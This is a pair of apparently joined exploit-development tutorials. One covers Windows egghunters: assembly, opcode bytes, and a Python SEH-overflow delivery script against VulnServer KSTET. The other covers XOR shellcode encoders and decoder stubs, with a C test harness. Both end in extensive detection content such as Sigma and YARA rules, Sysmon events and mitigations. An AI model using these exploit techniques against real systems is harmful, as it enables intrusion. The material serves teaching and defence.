Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.

I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.

1. Why Egghunters Exist

The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.

The layout in memory looks like this:

  small overflow buffer (~32-60B)        elsewhere in the process
  +---------------------------+          +-----------------------------+
  | EGGHUNTER (the "hunter")  | --scan-> | w00tw00t + full shellcode   |
  +---------------------------+          +-----------------------------+
                                  finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:

At least ~32 reachable bytes to hold the hunter itself.
The full payload must already be in memory when the hunter executes.

That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.

2. The Page-Walk Problem

x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.

The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses — it jumps straight to the next page boundary and probes again. Inside a valid page it advances one DWORD at a time looking for the tag.

The brief table of moving parts:

Component	Detail
Memory iterator register	`EDX` holds the current scan address
Page-boundary jump	`OR DX, 0x0FFF` → end of page; `INC EDX` → start of next page
Validity probe	A syscall (or an SEH frame) tests whether the page is readable
Egg comparison	`SCASD` compares `EAX` to `[EDI]` and auto-increments `EDI`
Transfer to payload	`JMP EDI` once both halves of the egg match

Flowchart showing the egghunter page-walk loop: snapping EDX to page boundaries with OR DX 0x0FFF, probing validity via INT 0x2E, skipping on access violation, scanning with SCASD, and jumping to payload on egg match. — The egghunter skips entire 4 KB pages on access violations rather than crawling byte-by-byte, keeping scan time tractable across the full virtual address space.

3. Anatomy of the Syscall Egghunter

The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.

; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
    or   dx, 0x0fff        ; EDX -> last byte of current 4KB page
loop_inc_one:
    inc  edx               ; advance one byte (rolls into next page)
loop_check:
    push edx               ; save scan pointer (clobbered by syscall)
    push 0x2               ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
    pop  eax               ;   -> EAX = 0x2   *** verify per OS, see j00ru ***
    int  0x2e              ; legacy syscall gate
    cmp  al, 0x05          ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
    pop  edx               ; restore scan pointer
    je   loop_inc_page     ; bad page -> skip to next page boundary
is_egg:
    mov  eax, 0x74303077   ; "w00t"
    mov  edi, edx          ; EDI = current address
    scasd                  ; compare [EDI] to EAX, EDI += 4
    jnz  loop_inc_one      ; first half mismatch -> keep scanning
    scasd                  ; compare the *second* half of the egg
    jnz  loop_inc_one
matched:
    jmp  edi               ; EDI now points just past the doubled tag

Two SCASD instructions back to back are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and because SCASD auto-advances EDI, after the second success EDI already points at the byte after the egg — exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically — only the syscall number differs.

Identifier	Value / Note
Syscall	`NtAccessCheckAndAuditAlarm`
Syscall number (x86 XP–7)	`0x02`
Invocation	`INT 0x2E`
Access-violation status	`0xC0000005` → `CMP AL, 0x05`
Invalid-page action	`JE loop_inc_page`
Size	~32 bytes

Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.

4. The SEH-Based Variant

Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.

; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
    push handler            ; EXCEPTION_REGISTRATION_RECORD.Handler
    push dword [fs:0]        ; .Next = current head of the SEH chain
    mov  [fs:0], esp         ; install our frame as the new chain head

    xor  edx, edx            ; scan pointer
scan_loop:
    inc  edx
    mov  edi, edx
    mov  eax, 0x74303077     ; "w00t"
    scasd                    ; read [EDI]; faults route into 'handler'
    jnz  scan_loop
    scasd                    ; confirm second half of the egg
    jnz  scan_loop
    pop  dword [fs:0]        ; restore previous SEH frame
    add  esp, 4
    jmp  edi                 ; transfer to payload
handler:                     ; entered on STATUS_ACCESS_VIOLATION
    ; bump saved EDX in the CONTEXT past the bad page,
    ; return ExceptionContinueExecution, resume scan_loop
    ret

Feature	Syscall variant	SEH variant
Size	~32 bytes	~60 bytes
Validity check	`INT 0x2E` → `NtAccessCheckAndAuditAlarm`	Custom `FS:[0]` handler
OS portability	Fragile (syscall # changes)	More portable
Detection surface	`INT 0x2E` is glaring	Quieter, but installs an SEH frame

That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.

Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability. — The syscall hunter wins on size but loses on portability; the SEH hunter avoids hardcoded syscall numbers at the cost of roughly double the byte footprint and its own SEH-frame detection surface.

5. Egg Tags and Bad Characters

The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.

First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters — \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.

Second, and easy to forget: the tag must be unique in process memory ahead of the payload. If the 4-byte value appears anywhere before your real payload — including elsewhere in your own crafted buffer — the hunter may jump there first and execute garbage. Scan your buffer before sending:

def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
    payload_at = buffer.find(tag * 2)     # the real, doubled egg
    earlier    = buffer.find(tag)          # any earlier single hit?
    if earlier != -1 and earlier < payload_at:
        print(f"[!] tag {tag!r} appears at offset {earlier} "
              f"before the payload at {payload_at}")
        return False
    return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

# Bad-character probe — compare against the in-memory dump in x64dbg/Immunity
allchars = bytes(range(1, 256))           # skip \x00 explicitly, test the rest
probe = b"A" * 66 + b"B" * 4 + allchars
# Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10

Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.

The CS segment selector reveals the mode — 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then far-calls through FS:[0xC0] to cross into 64-bit code.

; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov  ebx, cs            ; read code-segment selector
    cmp  bl, 0x23           ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov  bl, 0xc0
    call dword [fs:ebx]     ; far call via FS:[0xC0] -> 64-bit mode
    cmp  al, 0x05           ; STATUS_ACCESS_VIOLATION low byte
    je   loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly — verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.

7. Wiring It Into an SEH Overflow

A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.

[ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
   ... and the egg-tagged full payload lives in a SEPARATE field/request ...

#!/usr/bin/env python3
# LAB ONLY — staged egghunter delivery skeleton (offsets/gadget are placeholders)
import socket
RHOST, RPORT = "192.168.56.20", 9999

egghunter = (                       # 32-byte syscall hunter, tag "w00t"
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
nseh = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record
seh  = b"\x42\x42\x42\x42"           # PLACEHOLDER pop/pop/ret (find per target)
egg  = b"w00tw00t"                   # tag, doubled
payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

trigger  = b"A" * 66 + nseh + seh + egghunter
trigger += b"C" * (1000 - len(trigger))

with socket.create_connection((RHOST, RPORT)) as s:
    s.recv(1024)
    s.send(b"KSTET " + payload + b"\r\n")   # 1) stage the egg-tagged payload first
    s.send(b"KSTET " + trigger + b"\r\n")   # 2) THEN trigger overflow + run hunter

Flow diagram of a staged SEH overflow layout showing padding leading to nSEH short jump, SEH POP-POP-RET gadget, the egghunter in the constrained overflow buffer, and the egg-tagged full payload delivered separately in another request field. — The egg-tagged payload must arrive in a separate request before the overflow trigger is sent — reversing the order leaves the hunter scanning endlessly with nothing to find.

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.

8. Lab: VulnServer KSTET

VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:

Attach VulnServer in Immunity Debugger or x64dbg.
Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
Generate the hunter with mona: !mona egg -t w00t (add -c to encode out bad chars). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg — this is the moment that makes the mechanism click.

Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.

9. Detecting Egghunter Behavior

The hunter is loud if you’re listening. Two behavioral tells lead:

A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.

Event ID	Name	Relevance
`1`	Process Creation	Baseline parent-child chain for the vulnerable service
`8`	CreateRemoteThread	Egg payload injecting; `StartModule`/`StartFunction` empty when the start address is outside loaded modules — a shellcode tell
`10`	ProcessAccess	Cross-process handles requesting `PROCESS_VM_WRITE` (`0x0020`), `PROCESS_VM_OPERATION` (`0x0008`), `PROCESS_CREATE_THREAD` (`0x0002`)
`25`	ProcessTampering	Sysmon 13+; in-memory image diverging from disk — hallmark of in-memory execution

Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.

title: Remote Thread Start Address Outside Loaded Modules
id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader
status: experimental
logsource:
  product: windows
  category: create_remote_thread     # Sysmon Event ID 8
detection:
  selection:
    StartModule: ''
    StartFunction: ''
  condition: selection
level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688 with command lines. And flag INT 0x2E in user mode wherever EDR or ETW lets you — it’s about as high-fidelity as indicators get.

YARA pins the syscall hunter’s opcode signature for memory forensics:

rule Egghunter_Syscall_x86 {
    meta:
        description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
        author = "GenXCyber"
    strings:
        $page_walk = { 66 81 CA FF 0F }   // or dx, 0x0fff
        $syscall   = { CD 2E }            // int 0x2e
        $av_check  = { 3C 05 }            // cmp al, 0x05
        $scasd     = { AF }               // scasd
    condition:
        all of them and (@syscall - @page_walk) < 32
}

10. Tools for Egghunter Analysis

Tool	Description	Link
mona.py	Generates/verifies egghunters (`!mona egg`) in Immunity	`corelan.be`
Immunity Debugger	Classic exploit-dev debugger, mona host	`immunityinc.com`
x64dbg	Free user-mode debugger for stepping the scan	`x64dbg.com`
VulnServer	Safe, intentionally vulnerable practice target	`github.com`
Process Hacker	Spot the 100% CPU thread and handle access	`processhacker.sourceforge.io`
Sysmon	EID 8/10/25 telemetry for shellcode behavior	`microsoft.com`
j00ru syscall table	Authoritative per-OS syscall numbers	`j00ru.vexillium.org`
osed-scripts (epi052)	Egghunter generator and OSED helpers	`github.com`

11. Mitigations and Modern Reality

Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.

Mitigation	Effect on the technique
DEP / NX	Payload on stack/heap won’t execute; primary kill switch for legacy targets
ASLR	Hardcoded `POP/POP/RET` addresses break; forces wider scans → more CPU and ETW noise
Control Flow Guard	Validates indirect targets; disrupts the final `JMP EDI` when enforced
GS / stack canaries	Don’t stop the hunter, but can stop the overflow that delivers it
App sandboxing	Limits post-execution blast radius

The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.

12. MITRE ATT&CK Mapping

Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Service crash/recover, EID 1 anomalies
Process Injection	`T1055`	Sysmon EID 8/10, TI ETW
Process Injection: DLL Injection	`T1055.001`	EID 8 with empty `StartModule`
Reflective Code Loading	`T1620`	In-memory PE, EID 25 ProcessTampering
Obfuscated Files or Information	`T1027`	Encoded egg payload, YARA on decoder stubs
Sandbox Evasion: Time Based	`T1497.003`	CPU-spike artifact in sandboxes

Summary

An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm/INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core — a behavioral indicator in its own right.
Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window — and mitigate upstream with DEP, ASLR, and CFG.

References

Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.

1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

Byte	Name	Why it breaks things
`\x00`	NULL	Terminates C strings; `strcpy`/`sprintf` stop copying here
`\x0a`	Line Feed	Read as end-of-input by line-oriented protocols and `gets`
`\x0d`	Carriage Return	Paired with `\x0a` in HTTP/SMTP headers; often stripped
`\x20`	Space	Token delimiter in many parsers
`\xff`	0xFF	Sentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).

2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

A	K	A ⊕ K
0	0	0
0	1	1
1	0	1
1	1	0

There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.

Flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target — XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
Drop it into the vulnerable buffer and dump the buffer from memory.
Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the byte right before where the copy stopped is usually the terminator. Note it, exclude it, run again.

4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.

5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, use the full mov ecx, payload_len and clear ECX with xor ecx, ecx first.

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}

Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode — JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax → \x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.

7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte

Scheme	Pro	Con
Fixed single key	Smallest stub; one `xor` per byte	Fails when bad-char set is dense
Per-chunk key	Survives tight bad-char sets	Larger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.

8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).

9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fstenv [esp-0xc] to recover EIP without a tell-tale CALL — a deliberate jab at emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.

10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

Behavior	What it reveals
Tight `xor/inc/loop` over a code region	Classic fixed-key decoder stub
Region transitions writable → executable	Decoded payload about to run
Execution from unbacked memory	Code with no file on disk behind it

Sysmon Event IDs

Event ID	Name	Relevance
`1`	Process Creation	Loader/injector process spawn
`7`	Image Loaded	DLLs from temp/download paths into system processes
`8`	CreateRemoteThread	Thread created in another process — low-volume, high-signal
`10`	ProcessAccess	Cross-process memory access; inspect `GrantedAccess` and `CallTrace`
`25`	ProcessTampering	In-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.

ETW providers

Provider	Purpose
`Microsoft-Windows-Threat-Intelligence`	Kernel-level `VirtualAlloc`/`VirtualProtect`/`WriteProcessMemory`/`CreateRemoteThread`; consumed by PPL EDRs
`Microsoft-Windows-Security-Auditing`	Event ID `4688` process creation with command line
AMSI	Inspects script content after deobfuscation, before execution

Hardening

bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls — Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

Tool	Description	Link
NASM	Assemble x86/x64 decoder stubs	nasm.us
GDB + pwndbg	Single-step the decode loop, inspect `ESI`/`ECX`	gdb.gnu.org
objdump / objcopy	Disassemble stubs, extract `.text` bytes	gnu.org
Capstone	Programmatic opcode audit for bad chars	capstone-engine.org
pwntools	Encoder/exploit automation (`pwnlib.encoders`)	docs.pwntools.com
pe-sieve / Moneta	Scan live processes for RWX / unbacked memory	github.com
Sysmon	Endpoint telemetry for Event IDs 8, 10, 25	learn.microsoft.com

12. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Obfuscated Files or Information	`T1027`	Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded File	`T1027.013`	Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or Information	`T1140`	Self-modifying memory; ACG violations; ETW `VirtualProtect`
